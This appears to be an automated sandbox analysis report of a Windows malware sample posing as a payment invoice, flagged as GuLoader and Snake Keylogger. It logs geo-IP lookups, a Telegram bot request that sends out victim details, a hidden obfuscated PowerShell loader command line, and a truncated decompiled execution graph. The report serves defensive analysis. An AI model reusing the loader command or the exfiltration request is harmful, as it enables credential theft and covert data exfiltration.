                                                                                      2024-10-21 09:17:02 UTC87OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-10-21 09:17:03 UTC894INHTTP/1.1 200 OK
                                                                                      Date: Mon, 21 Oct 2024 09:17:03 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 27888
                                                                                      Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E3eS2JtzaaeDUafAM916C9Gu1%2F%2B5Oi47PzX7WegRsC%2FDwY55wCbZwgTY5WgPZg5hIOsZJ9JM7N9ie0Cn11d6auB4ElqUqk8Q7o0zir4aLXtaeIqsmNDWK0k1jKLWvSWMvktiEXkx"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8d6026fdcfef2cd0-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1510&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1892810&cwnd=246&unsent_bytes=0&cid=a2331851fee0101f&ts=147&x=0"
                                                                                      2024-10-21 09:17:03 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                                      Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                                      2024-10-21 09:17:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      9192.168.2.449752188.114.97.34437864C:\Windows\SysWOW64\msiexec.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-21 09:17:04 UTC87OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-10-21 09:17:04 UTC896INHTTP/1.1 200 OK
                                                                                      Date: Mon, 21 Oct 2024 09:17:04 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 27889
                                                                                      Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=3Scg6kmxdns8dQ87AKYKtiFpCUqmiLEvm9GDliE98mmHs6ZwAhJEcVTsoyFmJn5Yeie0Pb24PypHEH0vpN%2BlkoAL4%2F4oRYrgTLCM1qOXt8MzNPakn95hjImjazN2xltI%2BjkG%2Bh6g"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8d602707ee0e4772-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1634&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2849&recv_bytes=701&delivery_rate=1665324&cwnd=251&unsent_bytes=0&cid=9a2797feb542e3d9&ts=149&x=0"
                                                                                      2024-10-21 09:17:04 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                                      Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                                      2024-10-21 09:17:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      10192.168.2.449754188.114.97.34437864C:\Windows\SysWOW64\msiexec.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-21 09:17:06 UTC87OUTGET /xml/155.94.241.186 HTTP/1.1
                                                                                      Host: reallyfreegeoip.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-10-21 09:17:06 UTC904INHTTP/1.1 200 OK
                                                                                      Date: Mon, 21 Oct 2024 09:17:06 GMT
                                                                                      Content-Type: application/xml
                                                                                      Transfer-Encoding: chunked
                                                                                      Connection: close
                                                                                      access-control-allow-origin: *
                                                                                      vary: Accept-Encoding
                                                                                      Cache-Control: max-age=86400
                                                                                      CF-Cache-Status: HIT
                                                                                      Age: 27891
                                                                                      Last-Modified: Mon, 21 Oct 2024 01:32:15 GMT
                                                                                      Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=KY%2B92veoW%2BUlduKm7d4zog9Zji6%2FEA%2BweF0MqDx7VAF7mlo9reozZQH4Bd%2FVPvip7b14HTf97C6j3yNsB1c4OfzimM2eBkd9n8kqj9k%2Fb0BBCenhpoYPjnT%2BJ9Aq3e1u%2FQaOUSvc"}],"group":"cf-nel","max_age":604800}
                                                                                      NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                      Server: cloudflare
                                                                                      CF-RAY: 8d60271208942cd4-DFW
                                                                                      alt-svc: h3=":443"; ma=86400
                                                                                      server-timing: cfL4;desc="?proto=TCP&rtt=1814&sent=4&recv=6&lost=0&retrans=0&sent_bytes=2850&recv_bytes=701&delivery_rate=1592083&cwnd=251&unsent_bytes=0&cid=7e16ee5e56854efc&ts=148&x=0"
                                                                                      2024-10-21 09:17:06 UTC365INData Raw: 31 36 36 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 31 35 35 2e 39 34 2e 32 34 31 2e 31 38 36 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 54 58 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 54 65 78 61 73 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 44 61 6c 6c 61 73 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 37 35 32 34 37 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a
                                                                                      Data Ascii: 166<Response><IP>155.94.241.186</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode>TX</RegionCode><RegionName>Texas</RegionName><City>Dallas</City><ZipCode>75247</ZipCode><TimeZone>America/Chicago</TimeZ
                                                                                      2024-10-21 09:17:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                      Data Ascii: 0


                                                                                      Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                      11192.168.2.449755149.154.167.2204437864C:\Windows\SysWOW64\msiexec.exe
                                                                                      TimestampBytes transferredDirectionData
                                                                                      2024-10-21 09:17:07 UTC349OUTGET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:971342%0D%0ADate%20and%20Time:%2021/10/2024%20/%2019:09:45%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20971342%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1
                                                                                      Host: api.telegram.org
                                                                                      Connection: Keep-Alive
                                                                                      2024-10-21 09:17:07 UTC344INHTTP/1.1 404 Not Found
                                                                                      Server: nginx/1.18.0
                                                                                      Date: Mon, 21 Oct 2024 09:17:07 GMT
                                                                                      Content-Type: application/json
                                                                                      Content-Length: 55
                                                                                      Connection: close
                                                                                      Strict-Transport-Security: max-age=31536000; includeSubDomains; preload
                                                                                      Access-Control-Allow-Origin: *
                                                                                      Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
                                                                                      2024-10-21 09:17:07 UTC55INData Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d
                                                                                      Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}


                                                                                      Click to jump to process

                                                                                      Click to jump to process

                                                                                      Click to dive into process behavior distribution

                                                                                      Click to jump to process

                                                                                      Target ID:0
                                                                                      Start time:05:16:13
                                                                                      Start date:21/10/2024
                                                                                      Path:C:\Users\user\Desktop\FACTURA DE PAGO.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Users\user\Desktop\FACTURA DE PAGO.exe"
                                                                                      Imagebase:0x400000
                                                                                      File size:880'319 bytes
                                                                                      MD5 hash:DE02502F79BC183714A9DFE879831170
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:low
                                                                                      Has exited:true

                                                                                      Target ID:1
                                                                                      Start time:05:16:14
                                                                                      Start date:21/10/2024
                                                                                      Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"powershell.exe" -windowstyle hidden "$fkale=Get-Content -raw 'C:\Users\user\AppData\Roaming\underarmsmusklens\Edriophthalmian\Udlaanslofterne\Incuss.Pen';$Humongous=$fkale.SubString(4177,3);.$Humongous($fkale)"
                                                                                      Imagebase:0xbd0000
                                                                                      File size:433'152 bytes
                                                                                      MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000001.00000002.1914582277.0000000008D6C000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:2
                                                                                      Start time:05:16:14
                                                                                      Start date:21/10/2024
                                                                                      Path:C:\Windows\System32\conhost.exe
                                                                                      Wow64 process (32bit):false
                                                                                      Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                      Imagebase:0x7ff7699e0000
                                                                                      File size:862'208 bytes
                                                                                      MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Reputation:high
                                                                                      Has exited:true

                                                                                      Target ID:4
                                                                                      Start time:05:16:36
                                                                                      Start date:21/10/2024
                                                                                      Path:C:\Windows\SysWOW64\msiexec.exe
                                                                                      Wow64 process (32bit):true
                                                                                      Commandline:"C:\Windows\SysWOW64\msiexec.exe"
                                                                                      Imagebase:0x200000
                                                                                      File size:59'904 bytes
                                                                                      MD5 hash:9D09DC1EDA745A5F87553048E57620CF
                                                                                      Has elevated privileges:true
                                                                                      Has administrator privileges:true
                                                                                      Programmed in:C, C++ or other language
                                                                                      Yara matches:
                                                                                      • Rule: JoeSecurity_SnakeKeylogger, Description: Yara detected Snake Keylogger, Source: 00000004.00000002.2931722428.0000000020F01000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.2931722428.000000002100A000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                                                                                      Reputation:high
                                                                                      Has exited:false

                                                                                      Reset < >

                                                                                        Execution Graph

                                                                                        Execution Coverage:24.4%
                                                                                        Dynamic/Decrypted Code Coverage:0%
                                                                                        Signature Coverage:23%
                                                                                        Total number of Nodes:1250
                                                                                        Total number of Limit Nodes:40
                                                                                        execution_graph 2698 403a41 2699 403b94 2698->2699 2700 403a59 2698->2700 2702 403be5 2699->2702 2703 403ba5 GetDlgItem GetDlgItem 2699->2703 2700->2699 2701 403a65 2700->2701 2704 403a70 SetWindowPos 2701->2704 2705 403a83 2701->2705 2707 403c3f 2702->2707 2715 401389 2 API calls 2702->2715 2706 403f14 19 API calls 2703->2706 2704->2705 2709 403aa0 2705->2709 2710 403a88 ShowWindow 2705->2710 2711 403bcf SetClassLongA 2706->2711 2716 403b8f 2707->2716 2768 403f60 2707->2768 2712 403ac2 2709->2712 2713 403aa8 DestroyWindow 2709->2713 2710->2709 2714 40140b 2 API calls 2711->2714 2718 403ac7 SetWindowLongA 2712->2718 2719 403ad8 2712->2719 2717 403e9d 2713->2717 2714->2702 2720 403c17 2715->2720 2717->2716 2727 403ece ShowWindow 2717->2727 2718->2716 2723 403b81 2719->2723 2724 403ae4 GetDlgItem 2719->2724 2720->2707 2725 403c1b SendMessageA 2720->2725 2721 40140b 2 API calls 2739 403c51 2721->2739 2722 403e9f DestroyWindow EndDialog 2722->2717 2805 403f7b 2723->2805 2728 403b14 2724->2728 2729 403af7 SendMessageA IsWindowEnabled 2724->2729 2725->2716 2727->2716 2731 403b21 2728->2731 2732 403b68 SendMessageA 2728->2732 2733 403b34 2728->2733 2742 403b19 2728->2742 2729->2716 2729->2728 2731->2732 2731->2742 2732->2723 2736 403b51 2733->2736 2737 403b3c 2733->2737 2735 403f14 19 API calls 2735->2739 2741 40140b 2 API calls 2736->2741 2799 40140b 2737->2799 2738 403b4f 2738->2723 2739->2716 2739->2721 2739->2722 2739->2735 2759 403ddf DestroyWindow 2739->2759 2771 405d51 2739->2771 2789 403f14 2739->2789 2743 403b58 2741->2743 2802 403eed 2742->2802 2743->2723 2743->2742 2745 403ccc GetDlgItem 2746 403ce1 2745->2746 2747 403ce9 ShowWindow KiUserCallbackDispatcher 2745->2747 2746->2747 2792 403f36 EnableWindow 2747->2792 2749 403d13 EnableWindow 2752 403d27 2749->2752 2750 403d2c GetSystemMenu EnableMenuItem SendMessageA 2751 403d5c SendMessageA 2750->2751 2750->2752 2751->2752 2752->2750 2793 403f49 SendMessageA 2752->2793 2794 405d2f lstrcpynA 2752->2794 2755 403d8a lstrlenA 2756 405d51 18 API calls 2755->2756 2757 403d9b SetWindowTextA 2756->2757 2795 401389 2757->2795 2759->2717 2760 403df9 CreateDialogParamA 2759->2760 2760->2717 2761 403e2c 2760->2761 2762 403f14 19 API calls 2761->2762 2763 403e37 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 2762->2763 2764 401389 2 API calls 2763->2764 2765 403e7d 2764->2765 2765->2716 2766 403e85 ShowWindow 2765->2766 2767 403f60 SendMessageA 2766->2767 2767->2717 2769 403f78 2768->2769 2770 403f69 SendMessageA 2768->2770 2769->2739 2770->2769 2776 405d5e 2771->2776 2772 405f81 2773 405f96 2772->2773 2835 405d2f lstrcpynA 2772->2835 2773->2739 2775 405dff GetVersion 2775->2776 2776->2772 2776->2775 2777 405f58 lstrlenA 2776->2777 2780 405d51 10 API calls 2776->2780 2782 405e77 GetSystemDirectoryA 2776->2782 2783 405e8a GetWindowsDirectoryA 2776->2783 2785 405ebe SHGetSpecialFolderLocation 2776->2785 2786 405d51 10 API calls 2776->2786 2787 405f01 lstrcatA 2776->2787 2819 405c16 RegOpenKeyExA 2776->2819 2824 405f9a 2776->2824 2833 405c8d wsprintfA 2776->2833 2834 405d2f lstrcpynA 2776->2834 2777->2776 2780->2777 2782->2776 2783->2776 2785->2776 2788 405ed6 SHGetPathFromIDListA CoTaskMemFree 2785->2788 2786->2776 2787->2776 2788->2776 2790 405d51 18 API calls 2789->2790 2791 403f1f SetDlgItemTextA 2790->2791 2791->2745 2792->2749 2793->2752 2794->2755 2796 401390 2795->2796 2797 4013fe 2796->2797 2798 4013cb MulDiv SendMessageA 2796->2798 2797->2739 2798->2796 2800 401389 2 API calls 2799->2800 2801 401420 2800->2801 2801->2742 2803 403ef4 2802->2803 2804 403efa SendMessageA 2802->2804 2803->2804 2804->2738 2806 403f93 GetWindowLongA 2805->2806 2816 40401c 2805->2816 2807 403fa4 2806->2807 2806->2816 2808 403fb3 GetSysColor 2807->2808 2809 403fb6 2807->2809 2808->2809 2810 403fc6 SetBkMode 2809->2810 2811 403fbc SetTextColor 2809->2811 2812 403fe4 2810->2812 2813 403fde GetSysColor 2810->2813 2811->2810 2814 403feb SetBkColor 2812->2814 2815 403ff5 2812->2815 2813->2812 2814->2815 2815->2816 2817 404008 DeleteObject 2815->2817 2818 40400f CreateBrushIndirect 2815->2818 2816->2716 2817->2818 2818->2816 2820 405c87 2819->2820 2821 405c49 RegQueryValueExA 2819->2821 2820->2776 2822 405c6a RegCloseKey 2821->2822 2822->2820 2831 405fa6 2824->2831 2825 40600e 2826 406012 CharPrevA 2825->2826 2829 40602d 2825->2829 2826->2825 2827 406003 CharNextA 2827->2825 2827->2831 2829->2776 2830 405ff1 CharNextA 2830->2831 2831->2825 2831->2827 2831->2830 2832 405ffe CharNextA 2831->2832 2836 4057cc 2831->2836 2832->2827 2833->2776 2834->2776 2835->2773 2837 4057d2 2836->2837 2838 4057e5 2837->2838 2839 4057d8 CharNextA 2837->2839 2838->2831 2839->2837 3571 401cc2 3572 402a1d 18 API calls 3571->3572 3573 401cd2 SetWindowLongA 3572->3573 3574 4028cf 3573->3574 3575 401a43 3576 402a1d 18 API calls 3575->3576 3577 401a49 3576->3577 3578 402a1d 18 API calls 3577->3578 3579 4019f3 3578->3579 2840 401e44 2856 402a3a 2840->2856 2846 401eb0 CloseHandle 2848 4026a6 2846->2848 2847 401e5a 2847->2846 2847->2848 2849 401e79 WaitForSingleObject 2847->2849 2876 406104 2847->2876 2849->2847 2850 401e87 GetExitCodeProcess 2849->2850 2851 401ea4 2850->2851 2852 401e99 2850->2852 2851->2846 2855 401ea2 2851->2855 2880 405c8d wsprintfA 2852->2880 2855->2846 2857 402a46 2856->2857 2858 405d51 18 API calls 2857->2858 2859 402a67 2858->2859 2860 401e4a 2859->2860 2861 405f9a 5 API calls 2859->2861 2862 404f48 2860->2862 2861->2860 2863 401e54 2862->2863 2864 404f63 2862->2864 2873 4054c0 CreateProcessA 2863->2873 2865 404f80 lstrlenA 2864->2865 2866 405d51 18 API calls 2864->2866 2867 404fa9 2865->2867 2868 404f8e lstrlenA 2865->2868 2866->2865 2870 404fbc 2867->2870 2871 404faf SetWindowTextA 2867->2871 2868->2863 2869 404fa0 lstrcatA 2868->2869 2869->2867 2870->2863 2872 404fc2 SendMessageA SendMessageA SendMessageA 2870->2872 2871->2870 2872->2863 2874 4054f3 CloseHandle 2873->2874 2875 4054ff 2873->2875 2874->2875 2875->2847 2877 406121 PeekMessageA 2876->2877 2878 406131 2877->2878 2879 406117 DispatchMessageA 2877->2879 2878->2849 2879->2877 2880->2855 3580 402644 3581 40264a 3580->3581 3582 402652 FindClose 3581->3582 3583 4028cf 3581->3583 3582->3583 2929 4048c5 GetDlgItem GetDlgItem 2930 404917 7 API calls 2929->2930 2943 404b2f 2929->2943 2931 4049ba DeleteObject 2930->2931 2932 4049ad SendMessageA 2930->2932 2933 4049c3 2931->2933 2932->2931 2935 4049fa 2933->2935 2936 405d51 18 API calls 2933->2936 2934 404c13 2939 404cbf 2934->2939 2946 404ea7 2934->2946 2951 404c6c SendMessageA 2934->2951 2938 403f14 19 API calls 2935->2938 2940 4049dc SendMessageA SendMessageA 2936->2940 2937 404bf4 2937->2934 2948 404c05 SendMessageA 2937->2948 2945 404a0e 2938->2945 2941 404cd1 2939->2941 2942 404cc9 SendMessageA 2939->2942 2940->2933 2953 404ce3 ImageList_Destroy 2941->2953 2954 404cea 2941->2954 2962 404cfa 2941->2962 2942->2941 2943->2934 2943->2937 2944 404b8f 2943->2944 2985 404813 SendMessageA 2944->2985 2950 403f14 19 API calls 2945->2950 2947 403f7b 8 API calls 2946->2947 2952 404eb5 2947->2952 2948->2934 2966 404a1c 2950->2966 2951->2946 2956 404c81 SendMessageA 2951->2956 2953->2954 2957 404cf3 GlobalFree 2954->2957 2954->2962 2955 404e69 2955->2946 2960 404e7b ShowWindow GetDlgItem ShowWindow 2955->2960 2959 404c94 2956->2959 2957->2962 2958 404af0 GetWindowLongA SetWindowLongA 2961 404b09 2958->2961 2967 404ca5 SendMessageA 2959->2967 2960->2946 2963 404b27 2961->2963 2964 404b0f ShowWindow 2961->2964 2962->2955 2977 404d35 2962->2977 2990 404893 2962->2990 2984 403f49 SendMessageA 2963->2984 2983 403f49 SendMessageA 2964->2983 2965 404ba0 2965->2937 2966->2958 2968 404aea 2966->2968 2972 404a6b SendMessageA 2966->2972 2973 404aa7 SendMessageA 2966->2973 2974 404ab8 SendMessageA 2966->2974 2967->2939 2968->2958 2968->2961 2969 404d79 2978 404e3f InvalidateRect 2969->2978 2982 404ded SendMessageA SendMessageA 2969->2982 2972->2966 2973->2966 2974->2966 2976 404b22 2976->2946 2977->2969 2979 404d63 SendMessageA 2977->2979 2978->2955 2980 404e55 2978->2980 2979->2969 2999 4047ce 2980->2999 2982->2969 2983->2976 2984->2943 2986 404872 SendMessageA 2985->2986 2987 404836 GetMessagePos ScreenToClient SendMessageA 2985->2987 2988 40486a 2986->2988 2987->2988 2989 40486f 2987->2989 2988->2965 2989->2986 3002 405d2f lstrcpynA 2990->3002 2992 4048a6 3003 405c8d wsprintfA 2992->3003 2994 4048b0 2995 40140b 2 API calls 2994->2995 2996 4048b9 2995->2996 3004 405d2f lstrcpynA 2996->3004 2998 4048c0 2998->2977 3005 404709 2999->3005 3001 4047e3 3001->2955 3002->2992 3003->2994 3004->2998 3006 40471f 3005->3006 3007 405d51 18 API calls 3006->3007 3008 404783 3007->3008 3009 405d51 18 API calls 3008->3009 3010 40478e 3009->3010 3011 405d51 18 API calls 3010->3011 3012 4047a4 lstrlenA wsprintfA SetDlgItemTextA 3011->3012 3012->3001 3584 4026c6 3585 402a3a 18 API calls 3584->3585 3586 4026d4 3585->3586 3587 4026ea 3586->3587 3588 402a3a 18 API calls 3586->3588 3589 40597d 2 API calls 3587->3589 3588->3587 3590 4026f0 3589->3590 3612 4059a2 GetFileAttributesA CreateFileA 3590->3612 3592 4026fd 3593 4027a0 3592->3593 3594 402709 GlobalAlloc 3592->3594 3597 4027a8 DeleteFileA 3593->3597 3598 4027bb 3593->3598 3595 402722 3594->3595 3596 402797 CloseHandle 3594->3596 3613 4030c7 SetFilePointer 3595->3613 3596->3593 3597->3598 3600 402728 3601 4030b1 ReadFile 3600->3601 3602 402731 GlobalAlloc 3601->3602 3603 402741 3602->3603 3604 402775 3602->3604 3606 402e9f 32 API calls 3603->3606 3605 405a49 WriteFile 3604->3605 3607 402781 GlobalFree 3605->3607 3611 40274e 3606->3611 3608 402e9f 32 API calls 3607->3608 3609 402794 3608->3609 3609->3596 3610 40276c GlobalFree 3610->3604 3611->3610 3612->3592 3613->3600 3614 402847 3615 402a1d 18 API calls 3614->3615 3616 40284d 3615->3616 3617 40287e 3616->3617 3618 4026a6 3616->3618 3619 40285b 3616->3619 3617->3618 3620 405d51 18 API calls 3617->3620 3619->3618 3622 405c8d wsprintfA 3619->3622 3620->3618 3622->3618 3623 4022c7 3624 402a3a 18 API calls 3623->3624 3625 4022d8 3624->3625 3626 402a3a 18 API calls 3625->3626 3627 4022e1 3626->3627 3628 402a3a 18 API calls 3627->3628 3629 4022eb GetPrivateProfileStringA 3628->3629 3049 401bca 3050 402a1d 18 API calls 3049->3050 3051 401bd1 3050->3051 3052 402a1d 18 API calls 3051->3052 3053 401bdb 3052->3053 3054 401beb 3053->3054 3056 402a3a 18 API calls 3053->3056 3055 401bfb 3054->3055 3057 402a3a 18 API calls 3054->3057 3058 401c06 3055->3058 3059 401c4a 3055->3059 3056->3054 3057->3055 3060 402a1d 18 API calls 3058->3060 3061 402a3a 18 API calls 3059->3061 3062 401c0b 3060->3062 3063 401c4f 3061->3063 3065 402a1d 18 API calls 3062->3065 3064 402a3a 18 API calls 3063->3064 3066 401c58 FindWindowExA 3064->3066 3067 401c14 3065->3067 3070 401c76 3066->3070 3068 401c3a SendMessageA 3067->3068 3069 401c1c SendMessageTimeoutA 3067->3069 3068->3070 3069->3070 3486 401751 3487 402a3a 18 API calls 3486->3487 3488 401758 3487->3488 3489 401776 3488->3489 3490 40177e 3488->3490 3525 405d2f lstrcpynA 3489->3525 3526 405d2f lstrcpynA 3490->3526 3493 40177c 3497 405f9a 5 API calls 3493->3497 3494 401789 3495 4057a1 3 API calls 3494->3495 3496 40178f lstrcatA 3495->3496 3496->3493 3510 40179b 3497->3510 3498 406033 2 API calls 3498->3510 3499 40597d 2 API calls 3499->3510 3501 4017b2 CompareFileTime 3501->3510 3502 401876 3503 404f48 25 API calls 3502->3503 3505 401880 3503->3505 3504 404f48 25 API calls 3506 401862 3504->3506 3507 402e9f 32 API calls 3505->3507 3509 401893 3507->3509 3508 405d2f lstrcpynA 3508->3510 3511 4018a7 SetFileTime 3509->3511 3513 4018b9 CloseHandle 3509->3513 3510->3498 3510->3499 3510->3501 3510->3502 3510->3508 3512 405d51 18 API calls 3510->3512 3521 405525 MessageBoxIndirectA 3510->3521 3523 40184d 3510->3523 3524 4059a2 GetFileAttributesA CreateFileA 3510->3524 3511->3513 3512->3510 3513->3506 3514 4018ca 3513->3514 3515 4018e2 3514->3515 3516 4018cf 3514->3516 3517 405d51 18 API calls 3515->3517 3518 405d51 18 API calls 3516->3518 3520 4018ea 3517->3520 3519 4018d7 lstrcatA 3518->3519 3519->3520 3522 405525 MessageBoxIndirectA 3520->3522 3521->3510 3522->3506 3523->3504 3523->3506 3524->3510 3525->3493 3526->3494 3633 401651 3634 402a3a 18 API calls 3633->3634 3635 401657 3634->3635 3636 406033 2 API calls 3635->3636 3637 40165d 3636->3637 3638 401951 3639 402a1d 18 API calls 3638->3639 3640 401958 3639->3640 3641 402a1d 18 API calls 3640->3641 3642 401962 3641->3642 3643 402a3a 18 API calls 3642->3643 3644 40196b 3643->3644 3645 40197e lstrlenA 3644->3645 3650 4019b9 3644->3650 3646 401988 3645->3646 3646->3650 3651 405d2f lstrcpynA 3646->3651 3648 4019a2 3649 4019af lstrlenA 3648->3649 3648->3650 3649->3650 3651->3648 3652 404352 3653 40437e 3652->3653 3654 40438f 3652->3654 3713 405509 GetDlgItemTextA 3653->3713 3656 40439b GetDlgItem 3654->3656 3689 4043fa 3654->3689 3658 4043af 3656->3658 3657 404389 3659 405f9a 5 API calls 3657->3659 3661 4043c3 SetWindowTextA 3658->3661 3667 40583a 4 API calls 3658->3667 3659->3654 3665 403f14 19 API calls 3661->3665 3662 404688 3666 